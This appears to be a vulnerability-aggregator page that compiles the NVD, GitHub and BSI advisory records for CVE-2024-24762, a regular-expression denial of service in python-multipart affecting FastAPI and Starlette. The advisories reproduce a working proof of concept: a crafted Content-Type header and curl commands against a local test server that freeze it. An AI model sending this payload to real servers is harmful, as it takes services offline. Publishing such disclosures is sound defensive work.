            "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1",
            "refsource": "MISC",
            "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-2jv5-9r88-3w3p",
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "cve": {
        "configurations": [
          {
            "nodes": [
              {
                "cpeMatch": [
                  {
                    "criteria": "cpe:2.3:a:tiangolo:fastapi:*:*:*:*:*:*:*:*",
                    "matchCriteriaId": "8B47D84E-D97C-4E52-91AE-270FCFA34800",
                    "versionEndExcluding": "0.109.1",
                    "vulnerable": true
                  }
                ],
                "negate": false,
                "operator": "OR"
              }
            ]
          }
        ],
        "descriptions": [
          {
            "lang": "en",
            "value": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7."
          },
          {
            "lang": "es",
            "value": "FastAPI es un framework web para crear API con Python 3.8+ basado en sugerencias de tipo est\u00e1ndar de Python. Cuando se utilizan datos de formulario, `python-multipart` usa una expresi\u00f3n regular para analizar el encabezado HTTP `Content-Type`, incluidas las opciones. Un atacante podr\u00eda enviar una opci\u00f3n de \"Tipo de contenido\" personalizada que es muy dif\u00edcil de procesar para RegEx, consumiendo recursos de CPU y deteni\u00e9ndose indefinidamente (minutos o m\u00e1s) mientras se mantiene el bucle de evento principal. Esto significa que el proceso no puede manejar m\u00e1s solicitudes. Es un ReDoS (expresi\u00f3n regular de denegaci\u00f3n de servicio), solo se aplica a aquellos que leen datos del formulario usando `python-multipart`. Esta vulnerabilidad ha sido parcheada en la versi\u00f3n 0.109.0."
          }
        ],
        "id": "CVE-2024-24762",
        "lastModified": "2024-02-17T02:15:52.700",
        "metrics": {
          "cvssMetricV31": [
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 3.6,
              "source": "nvd@nist.gov",
              "type": "Primary"
            },
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 3.6,
              "source": "security-advisories@github.com",
              "type": "Secondary"
            }
          ]
        },
        "published": "2024-02-05T15:15:09.260",
        "references": [
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Patch"
            ],
            "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Product"
            ],
            "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Exploit",
              "Vendor Advisory"
            ],
            "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
          }
        ],
        "sourceIdentifier": "security-advisories@github.com",
        "vulnStatus": "Modified",
        "weaknesses": [
          {
            "description": [
              {
                "lang": "en",
                "value": "CWE-1333"
              }
            ],
            "source": "nvd@nist.gov",
            "type": "Primary"
          },
          {
            "description": [
              {
                "lang": "en",
                "value": "CWE-400"
              }
            ],
            "source": "security-advisories@github.com",
            "type": "Secondary"
          }
        ]
      }
    }
  }
}

ghsa-2jv5-9r88-3w3p

Vulnerability from github

Published

2024-02-12 17:28

Modified

2024-09-24 15:58

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

python-multipart vulnerable to Content-Type Header ReDoS

Details

Summary

When using form data, python-multipart uses a Regular Expression to parse the HTTP Content-Type header, including options.

An attacker could send a custom-made Content-Type option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.

This can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

This only applies when the app uses form data, parsed with python-multipart.

Details

A regular HTTP Content-Type header could look like:

Content-Type: text/html; charset=utf-8

python-multipart parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74

A custom option could be made and sent to the server to break it with:

Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

PoC

Create a simple WSGI application, that just parses the Content-Type, and run it with python main.py:

```Python

main.py

from wsgiref.simple_server import make_server from wsgiref.validate import validator

from multipart.multipart import parse_options_header

def simple_app(environ, start_response): _, _ = parse_options_header(environ["CONTENT_TYPE"])

start_response("200 OK", [("Content-type", "text/plain")])
return [b"Ok"]

httpd = make_server("", 8123, validator(simple_app)) print("Serving on port 8123...") httpd.serve_forever() ```

Then send the attacking request with:

console $ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'

Impact

This is a ReDoS, (Regular expression Denial of Service), so it only applies to those using python-multipart to read form data, such as Starlette and FastAPI.

Original Report

This was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r

Original report to FastAPI

Hey Tiangolo! My name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON). Here are the details: I'm using the latest version of FastAPI (0.109.0) and the following code: ```Python from typing import Annotated from fastapi.responses import HTMLResponse from fastapi import FastAPI,Form from pydantic import BaseModel class Item(BaseModel): username: str app = FastAPI() @app.get("/", response_class=HTMLResponse) async def index(): return HTMLResponse("Test", status_code=200) @app.post("/submit/") async def submit(username: Annotated[str, Form()]): return {"username": username} @app.post("/submit_json/") async def submit_json(item: Item): return {"username": item.username} ``` I'm running the above with uvicorn with the following command: ```console uvicorn server:app ``` Then run the following cUrl command: ``` curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/' ``` You'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100% You can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server. If you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data. Cheers #### Impact An attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data. #### Occurrences [params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.0.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "python-multipart"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-24762"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-12T17:28:12Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a simple WSGI application, that just parses the `Content-Type`, and run it with `python main.py`:\n\n```Python\n# main.py\nfrom wsgiref.simple_server import make_server\nfrom wsgiref.validate import validator\n\nfrom multipart.multipart import parse_options_header\n\n\ndef simple_app(environ, start_response):\n    _, _ = parse_options_header(environ[\"CONTENT_TYPE\"])\n\n    start_response(\"200 OK\", [(\"Content-type\", \"text/plain\")])\n    return [b\"Ok\"]\n\n\nhttpd = make_server(\"\", 8123, validator(simple_app))\nprint(\"Serving on port 8123...\")\nhttpd.serve_forever()\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X \u0027POST\u0027 -H $\u0027Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\u0027 --data-binary \u0027input=1\u0027 \u0027http://localhost:8123/\u0027\n```\n\n### Impact\n\nThis is a ReDoS, (Regular expression Denial of Service), so it only applies to those using python-multipart to read form data, such as Starlette and FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal report to FastAPI\u003c/summary\u003e\n\nHey Tiangolo!\n\nMy name\u0027s Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I\u0027m using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n    username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n    return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n    return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n    return {\"username\": item.username}\n```\n\nI\u0027m running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X \u0027POST\u0027 -H $\u0027Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\u0027 --data-binary \u0027input=1\u0027 \u0027http://localhost:8000/submit/\u0027\n```\n\nYou\u0027ll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you\u0027ll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you\u0027ll see it isn\u0027t vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n\u003c/details\u003e",
  "id": "GHSA-2jv5-9r88-3w3p",
  "modified": "2024-09-24T15:58:43Z",
  "published": "2024-02-12T17:28:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762"
    },
    {
      "type": "WEB",
      "url": "https://github.com/github/advisory-database/pull/4829"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Kludex/python-multipart"
    },
    {
      "type": "WEB",
      "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/fastapi/PYSEC-2024-38.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "python-multipart vulnerable to Content-Type Header ReDoS"
}

wid-sec-w-2024-0592

Vulnerability from csaf_certbund

Published

2024-03-10 23:00

Modified

2024-04-01 22:00

Summary

IBM App Connect Enterprise: Schwachstelle ermöglicht Denial of Service

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung

IBM App Connect Enterprise kombiniert die branchenbewährten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.

Angriff

Ein entfernter, anonymer Angreifer kann eine Schwachstelle in IBM App Connect Enterprise ausnutzen, um einen Denial of Service Angriff durchzuführen.

Betroffene Betriebssysteme

- Sonstiges

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "mittel"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "IBM App Connect Enterprise kombiniert die branchenbew\u00e4hrten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in IBM App Connect Enterprise ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Sonstiges",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2024-0592 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-0592.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2024-0592 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-0592"
      },
      {
        "category": "external",
        "summary": "IBM Security Bulletin vom 2024-03-10",
        "url": "https://www.ibm.com/support/pages/node/7130872"
      },
      {
        "category": "external",
        "summary": "Proof of Concept (PoC)",
        "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
      },
      {
        "category": "external",
        "summary": "IBM Security Bulletin 7145680 vom 2024-04-02",
        "url": "https://www.ibm.com/support/pages/node/7145680"
      }
    ],
    "source_lang": "en-US",
    "title": "IBM App Connect Enterprise: Schwachstelle erm\u00f6glicht Denial of Service",
    "tracking": {
      "current_release_date": "2024-04-01T22:00:00.000+00:00",
      "generator": {
        "date": "2024-08-15T18:06:17.543+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.3.5"
        }
      },
      "id": "WID-SEC-W-2024-0592",
      "initial_release_date": "2024-03-10T23:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2024-03-10T23:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        },
        {
          "date": "2024-04-01T22:00:00.000+00:00",
          "number": "2",
          "summary": "Neue Updates von IBM aufgenommen"
        }
      ],
      "status": "final",
      "version": "2"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "Certified Container Operator \u003c 11.3.0",
                "product": {
                  "name": "IBM App Connect Enterprise Certified Container Operator \u003c 11.3.0",
                  "product_id": "T033353"
                }
              },
              {
                "category": "product_version_range",
                "name": "DesignerAuthoring \u003c 12.0.11.2-r1",
                "product": {
                  "name": "IBM App Connect Enterprise DesignerAuthoring \u003c 12.0.11.2-r1",
                  "product_id": "T033354"
                }
              },
              {
                "category": "product_version_range",
                "name": "Certified Container Operator \u003c 5.0.15",
                "product": {
                  "name": "IBM App Connect Enterprise Certified Container Operator \u003c 5.0.15",
                  "product_id": "T033355"
                }
              }
            ],
            "category": "product_name",
            "name": "App Connect Enterprise"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c 23.0.2-IF003",
                "product": {
                  "name": "IBM Business Automation Workflow \u003c 23.0.2-IF003",
                  "product_id": "T033813"
                }
              }
            ],
            "category": "product_name",
            "name": "Business Automation Workflow"
          }
        ],
        "category": "vendor",
        "name": "IBM"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-24762",
      "notes": [
        {
          "category": "description",
          "text": "Es besteht eine Schwachstelle in IBM App Connect Enterprise. Dieser Fehler besteht in der FastAPI aufgrund eines Denial-of-Service-Problems durch regul\u00e4re Ausdr\u00fccke (ReDos). Durch Senden einer speziell gestalteten Regex-Eingabe kann ein entfernter, anonymer Angreifer diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu verursachen."
        }
      ],
      "product_status": {
        "known_affected": [
          "T033813"
        ]
      },
      "release_date": "2024-03-10T23:00:00.000+00:00",
      "title": "CVE-2024-24762"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

cve-2024-24762

Vulnerability from cvelistv5

pysec-2024-38

Vulnerability from pysec

gsd-2024-24762

Vulnerability from gsd

ghsa-2jv5-9r88-3w3p

Vulnerability from github

Summary

Details

PoC

main.py

Impact

Original Report

wid-sec-w-2024-0592

Vulnerability from csaf_certbund

Tags

Sightings

Nomenclature